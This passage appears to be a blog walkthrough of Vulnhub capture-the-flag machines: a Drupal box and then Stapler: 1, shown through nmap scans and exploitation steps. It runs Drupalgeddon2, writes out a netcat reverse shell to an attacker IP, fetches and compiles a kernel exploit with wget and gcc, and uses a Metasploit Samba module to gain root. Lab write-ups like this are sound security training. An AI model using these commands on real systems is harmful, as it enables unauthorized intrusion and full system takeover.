Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.73 ms 192.168.18.88

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 366.39 seconds

Lets visit the website running in the machine.

Lets go to the website now.

Looks like the site is running on Drupal. Lets do a scan using Droopescan.

droopescan scan drupal -u http://192.168.18.88/jabc

Seems like the Drupal version is 7.22 – 7.26

Lets look for vulnarabilites now.

Have a look here: https://github.com/dreadlocked/Drupalgeddon2

Looks like works in Drupal 7.x. Lets try that

ruby drupalgeddon2.rb http://192.168.18.88/jabc

We got a shell! Lets check the user.

Time for Privilege escalation. First lets get a shell through netcat

Start a listener in kali.

root@kali:~# nc -nlvp 7777

and connect from victim machine.

nc -e /bin/sh 192.168.18.87 7777

Done.

Time for Privilege Escalation

Lets search for the OS information.

uname -a

Now search for Ubuntu 3.13 exploits using searchsploit.

searchsploit ubuntu 3.13

Lets try the first one. Linux Kernel 3.13.0 < 3.19 exploit.

wget the file to machine.

wget https://www.exploit-db.com/download/37292

Now rename the file to 37292.c and compile.

mv 37292 37292.c
gcc -o exploit 37292.c

Make sure that the exploit is there. and enter ./exploit to run it.

and… We are root!

Lets find the flag.

cd /root
cat flag.txt

Lets do another machine next day!

Stapler: 1 Vulnhub Machine Walkthrough

Lets find out the IP first with nmap

nmap 192.168.18.0/24

The IP is 192.168.18.85.

Lets run an extended scan to enumerate the services and versions, with a basic vulnerability scan in nmap.

root@kali:~# nmap -sV -O -A -T5 --script vuln 192.168.18.85
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-10 04:00 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).

Nmap scan report for 192.168.18.85
Host is up (0.00064s latency).
Not shown: 992 filtered ports
PORT     STATE  SERVICE     VERSION
20/tcp   closed ftp-data
21/tcp   open   ftp         vsftpd 2.0.8 or later
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
22/tcp   open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
53/tcp   open   domain      dnsmasq 2.75
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:thekelleys:dnsmasq:2.75: 
|       CVE-2019-14513  5.0     https://vulners.com/cve/CVE-2019-14513
|_      CVE-2019-14834  4.3     https://vulners.com/cve/CVE-2019-14834
80/tcp   open   http        PHP cli server 5.5 or later
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to                                                                                    
|       the target web server and sending a partial request. By doing so, it starves 
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
139/tcp  open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
666/tcp  open   doom?
3306/tcp open   mysql       MySQL 5.7.12-0ubuntu1
MAC Address: 08:00:27:EC:EF:56 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.64 ms 192.168.18.85

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 565.32 seconds

Didnt find anything interesting from the port 80 web page, nikto and gobuster scan.

samba is running on port 139. Lets try to exploit it before going to ftp.

msfconsole
msf5 > msf5 > use exploit/linux/samba/is_known_pipename

Now set the options

Time to run the exploit. Enter run

We got the root. Now lets read the flag.

cat /root/flag.txt

Finished! Thats all for today.